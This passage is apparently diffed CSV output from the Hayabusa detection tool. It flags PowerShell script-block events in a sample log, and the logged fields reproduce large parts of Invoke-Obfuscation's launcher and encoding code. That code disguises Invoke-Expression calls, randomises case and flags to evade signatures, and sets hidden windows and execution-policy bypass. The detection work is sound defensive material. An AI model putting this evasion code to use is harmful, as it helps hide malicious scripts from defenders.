@('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will iterate through each element of the array. $BaseScriptArray1 = ""`$$RandomScriptVar[0..(`$$RandomScriptVar.$Length-1)]"" # Generate random JOIN syntax for all above options. $NewScriptArray1 = @() $NewScriptArray1 += $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray1 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript1 = (Get-Random -Input $NewScriptArray1) # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray2 = @() $BaseScriptArray2 += '(' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DigitDelimiterChar + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 += ""`[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int[]]"" + ' '*(Get-Random -Input @(0,1)) + ""("" + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 = (Get-Random -Input $BaseScriptArray2) # Generate random JOIN syntax for all above options. $NewScriptArray2 = @() $NewScriptArray2 += $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray2 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + $BaseScriptArray2 + ')' $NewScriptArray2 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + ')' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray2) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Insert)"" , ""''.Insert.ToString()"")) + '[' + (Get-Random -Input @(3,7,14,23,33)) + ',' + (Get-Random -Input @(10,26,41)) + "",27]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Normalize)"" , ""''.Normalize.ToString()"")) + '[' + (Get-Random -Input @(3,13,23,33,55,59,77)) + ',' + (Get-Random -Input @(15,35,41,45)) + "",46]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Chars)"" , ""''.Chars.ToString()"")) + '[' + (Get-Random -Input @(11,15)) + ',' + (Get-Random -Input @(18,24)) + "",19]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.SubString)"" , ""''.SubString.ToString()"")) + '[' + (Get-Random -Input @(3,13,17,26,37,47,51,60,67)) + ',' + (Get-Random -Input @(29,63,72)) + ',' + (Get-Random -Input @(30,64)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Remove)"" , ""''.Remove.ToString()"")) + '[' + (Get-Random -Input @(3,14,23,30,45,56,65)) + ',' + (Get-Random -Input @(8,12,26,50,54,68)) + ',' + (Get-Random -Input @(27,69)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOfAny)"" , ""''.LastIndexOfAny.ToString()"")) + '[' + (Get-Random -Input @(0,8,34,42,67,76,84,92,117,126,133)) + ',' + (Get-Random -Input @(11,45,79,95,129)) + ',' + (Get-Random -Input @(12,46,80,96,130)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOf)"" , ""''.LastIndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,8,29,37,57,66,74,82,102,111,118,130,138,149,161,169,180,191,200,208,216,227,238,247,254,266,274,285,306,315,326,337,345,356,367,376,393,402,413,424,432,443,454,463,470,491,500,511)) + ',' + (Get-Random -Input @(11,25,40,54,69,85,99,114,141,157,172,188,203,219,235,250,277,293,300,333,348,364,379,387,420,435,451,466,485,518)) + ',' + (Get-Random -Input @(12,41,70,86,115,142,173,204,220,251,278,349,380,436,467)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IsNormalized)"" , ""''.IsNormalized.ToString()"")) + '[' + (Get-Random -Input @(5,13,26,34,57,61,75,79)) + ',' + (Get-Random -Input @(15,36,43,47)) + "",48]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOfAny)"" , ""''.IndexOfAny.ToString()"")) + '[' + (Get-Random -Input @(0,4,30,34,59,68,76,80,105,114,121)) + ',' + (Get-Random -Input @(7,37,71,83,117)) + ',' + (Get-Random -Input @(8,38,72,84,118)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOf)"" , ""''.IndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,4,25,29,49,58,66,70,90,99,106,118,122,133,145,149,160,171,180,188,192,203,214,223,230,242,246,257,278,287,298,309,313,324,335,344,361,370,381,392,396,407,418,427,434,455,464,475)) + ',' + (Get-Random -Input @(7,21,32,46,61,73,87,102,125,141,152,168,183,195,211,226,249,265,272,305,316,332,347,355,388,399,415,430,449,482)) + ',' + (Get-Random -Input @(8,33,62,74,103,126,153,184,196,227,250,317,348,400,431)) + ""]-Join''"" + "")"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Randomly choose from above invoke operation syntaxes. $NewScript = (Get-Random -Input $InvokeOptions) # Reassemble all components of the final command. $NewScript = $ScriptStringPart1 + $NewScript + '}' # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(G",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"et-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.285 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"et-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-PowerShellLauncher { <# .SYNOPSIS Applies launch syntax to PowerShell command so it can be run from cmd.exe and have its command line arguments further obfuscated via launch obfuscation techniques. Invoke-Obfuscation Function: Out-PowerShellLauncher Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (used for WMIC launcher -- located in Out-ObfuscatedStringCommand.ps1), Out-ConcatenatedString (used for WMIC and MSHTA launchers -- located in Out-ObfuscatedTokenCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-PowerShellLauncher obfuscates a given PowerShell command (via stdin, process-level environment variables, clipboard, etc.) while wrapping it in syntax to be launched directly from cmd.exe. Some techniques also push command line arguments to powershell.exe's parent (denoted with +) or even grandparent (denoted with ++) process command line arguments. 1 --> PS 2 --> CMD 3 --> WMIC 4 --> RUNDLL 5 --> VAR+ 6 --> STDIN+ 7 --> CLIP+ 8 --> VAR++ 9 --> STDIN++ 10 --> CLIP++ 11 --> RUNDLL++ 12 --> MSHTA++ .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER LaunchType Specifies the launch syntax to apply to ScriptBlock. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER SwitchesAsString (Optional) Specifies above PowerShell execution flags per a single string. .EXAMPLE C:\PS> Out-PowerShellLauncher -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive 3 C:\windows\SYstEM32\cmd.EXe /C ""sET oPUWV=Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green&& POWErshELl -NOnINt -noPrOfil ${eX`eCUti`on`cO`NTeXT}.\""INVO`k`e`coMMANd\"".\""INvo`KeS`C`RIPt\""( ( GET-CHI`Ldit`EM EnV:OPuwV ).\""v`AlUE\"" )"" .NOTES This cmdlet is an ideal last step after applying other obfuscation cmdlets to your script block or file path contents. Its more advanced obfuscation options are included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent or grandparent process' command line arguments. There are additional techniques to split the command contents cross multiple commands and have the final PowerShell command re-assemble in memory and execute that are not currently included in this version. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [ValidateSet(1,2,3,4,5,6,7,8,9,10,11,12)] [Int] $LaunchType, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Parameter(Position = 2)] [String] $SwitchesAsString ) # To capture and output args in a process tree format for the applied launcher syntax. $ArgsDefenderWillSee = @() # Convert ScriptBlock to a String. $ScriptString = [String]$ScriptBlock # Check and throw warning message if input $ScriptString contains new line characters. If($ScriptString.Contains([Char]13+[Char]10)) { Write-Host """" Write-Warning ""Current script content contains newline characters.`n Applying a launcher will not work on the command line.`n Apply ENCODING obfuscation before applying LAUNCHER."" Start-Sleep 1 Return $ScriptString } # $SwitchesAsString argument for passing in flags from user input in Invoke-Obfuscation. If($SwitchesAsString.Length -gt 0) { If(!($SwitchesAsString.Contains('0'))) { $SwitchesAsString = ([Char[]]$SwitchesAsString | Sort-Object -Unique -Descending) -Join ' ' ForEach($SwitchAsString in $SwitchesAsString.Split(' ')) { Switch($SwitchAsString) { '1' {$NoExit = $TRUE} '2' {$NonInteractive = $TRUE} '3' {$NoLogo = $TRUE} '4' {$NoProfile = $TRUE} '5' {$Command = $TRUE} '6' {$WindowsStyle = 'Hidden'} '7' {$ExecutionPolicy = 'Bypass'} '8' {$Wow64 = $TRUE} default {Write-Error ""An invalid `$SwitchAsString value ($SwitchAsString) was passed to switch block for Out-PowerShellLauncher""; Exit;} } } } } # Parse out and escape key characters in particular token types for powershell.exe (in reverse to make indexes simpler for escaping tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $CharsToEscape = @('&','|','<','>') For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Manually extract token since tokenization will remove certain characters and whitespace which we want to retain. $PreTokenStr = $ScriptString.SubString(0,$Token.Start) $ExtractedToken = $ScriptString.SubString($Token.Start,$Token.Length) $PostTokenStr = $ScriptString.SubString($Token.Start+$Token.Length) # Escape certain characters that will be problematic on the command line for powershell.exe (\) and cmd.exe (^). # Single cmd escaping (^) for strings encapsulated by double quotes. For all other tokens apply double layer escaping (^^^). If($Token.Type -eq 'String' -AND !($ExtractedToken.StartsWith(""'"") -AND $ExtractedToken.EndsWith(""'""))) { ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^$Char"")} } If($ExtractedToken.Contains('\')) {$ExtractedToken = $ExtractedToken.Replace('\','\\')} If($ExtractedToken.Contains('""')) {$ExtractedToken = '\""' + $ExtractedToken.SubString(1,$ExtractedToken.Length-1-1) + '\""'} } Else { # Before adding layered escaping for special characters for cmd.exe, preserve escaping of ^ used NOT as an escape character (like as part of an Empire key). If($ExtractedToken.Contains('^')) { $ExtractedTokenSplit = $ExtractedToken.Split('^') $ExtractedToken = '' For($j=0; $j -lt $ExtractedTokenSplit.Count; $j++) { $ExtractedToken += $ExtractedTokenSplit[$j] $FirstCharFollowingCaret = $ExtractedTokenSplit[$j+1] If(!$FirstCharFollowingCaret -OR ($CharsToEscape -NotContains $FirstCharFollowingCaret.SubString(0,1)) -AND ($j -ne $ExtractedTokenSplit.Count-1)) { $ExtractedToken += '^^^^' } } } ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^^^$Char"")} } } # Add $ExtractedToken back into context in $ScriptString $ScriptString = $PreTokenStr + $ExtractedToken + $PostTokenStr } # Randomly select PowerShell execution flag argument substrings and randomize the order for all flags passed to this function. # This is to prevent the Blue Team from placing false hope in simple signatures for the shortest form of these arguments or consistent ordering. $PowerShellFlags = New-Object String[](0) If($PSBoundParameters['NoExit'] -OR $NoExit) { $FullArgument = ""-NoExit"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile'] -OR $NoProfile) { $FullArgument = ""-NoProfile"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive'] -OR $NonInteractive) { $FullArgument = ""-NonInteractive"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo'] -OR $NoLogo) { $FullArgument = ""-NoLogo"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to overwrite the WindowStyle value with the corresponding integer representation of the predefined parameter value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random 